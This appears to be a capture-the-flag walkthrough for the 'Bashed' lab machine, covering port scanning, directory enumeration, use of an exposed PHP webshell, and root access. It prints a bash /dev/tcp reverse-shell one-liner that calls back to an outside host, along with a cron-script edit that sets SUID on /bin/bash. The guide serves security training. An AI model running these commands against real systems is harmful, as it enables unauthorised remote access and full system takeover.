Bashed

Enumeration

As usual, we start with an nmap scan, in order to find open ports in the target machine.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

As we see, only port 80 (HTTP) is open. Let's try to obtain more information about the service and version running on that port.

nmap -sC -sV -p80 10.10.10.68 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

Let's take a look at the website.

Doesn't have much going on. Let's enumerate directories with gobuster.

gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200

  • dir enumerates directories or files.

  • -u the target URL.

  • -w path to the wordlist.

  • -t number of current threads, in this case 200 threads.

Exploitation

If we take a look at the /dev directory, we should see a few PHP files.

If we click on the phpbash.php file, basically we will find a webshell.

Let's get a reverse shell. First, let's set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then on the webshell we'll have to execute the following to get a shell and be able to get the user flag.

bash -c "bash -i >%26 /dev/tcp/10.0.0.1/8080 0>%261"

Privilege Escalation

Let's start the privilege escalation phase by listing the sudo privileges of the www-data user.

sudo -l

  • -l list user privileges.

We can execute any command as the scriptmanager user. Let's get a shell as the scriptmanager user.

sudo -u scriptmanager bash

If we list the files that have scriptmanager as owner user, we will see the test.py file in the /scripts folder. And if we look inside the folder, we'll see another file owned by root.

ls -l /script

Let's see the content of the test.py and test.txt file.

cat /scripts/test.py

cat /scripts/test.txt

There must be some sort of scheduled task executed by root which runs the test.py script. The idea here is to change the /scripts/test.py script and make it give the /bin/bash binary the SUID permission, so when root executes it, bash permissions will change.

nano /scripts/test.py

Now all we have to do is wait until the /bin/bash binary has the SUID permission activated.

ls -l

Finally, all we have to do is execute bash with the owner permissions, and reap the harvest and take the root flag.

bash -p

Last updated

Was this helpful?